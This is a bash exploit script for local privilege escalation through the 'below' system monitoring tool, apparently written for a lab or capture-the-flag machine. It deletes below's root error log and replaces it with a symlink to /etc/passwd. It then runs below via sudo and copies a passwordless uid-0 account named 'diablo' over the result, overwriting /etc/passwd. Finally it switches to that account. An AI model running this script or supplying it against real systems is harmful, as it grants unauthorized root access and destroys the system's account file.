#!/bin/bash
# Exploit for Below privilege escalation
# Creates a root user 'diablo' via /var/log/below/error_root.log

# Temporary file
TMP_FILE="/tmp/fake_diablo_passwd"

echo "[*] Creating fake root user entry for 'diablo'..."
echo 'diablo::0:0:diablo:/root:/bin/bash' > "$TMP_FILE"
echo "[+] Temporary passwd file created at $TMP_FILE"

echo "[*] Removing original Below log file if it exists..."
rm -f /var/log/below/error_root.log
echo "[+] Removed old error_root.log"

echo "[*] Creating symlink from /var/log/below/error_root.log -> /etc/passwd..."
ln -s /etc/passwd /var/log/below/error_root.log
echo "[+] Symlink created"

echo "[*] Running Below to log error..."
sudo /usr/bin/below snapshot --begin veryfake &> /dev/null
echo "[+] Below triggered (error logged as 'running below to log error')"

echo "[*] Overwriting Below log with fake passwd entry..."
cp "$TMP_FILE" /var/log/below/error_root.log
echo "[+] Fake passwd entry applied"

echo "[*] Cleaning up temporary file..."
rm -f "$TMP_FILE"
echo "[+] Temporary file removed"

echo "[*] Switching to new root user 'diablo'..."
su diablo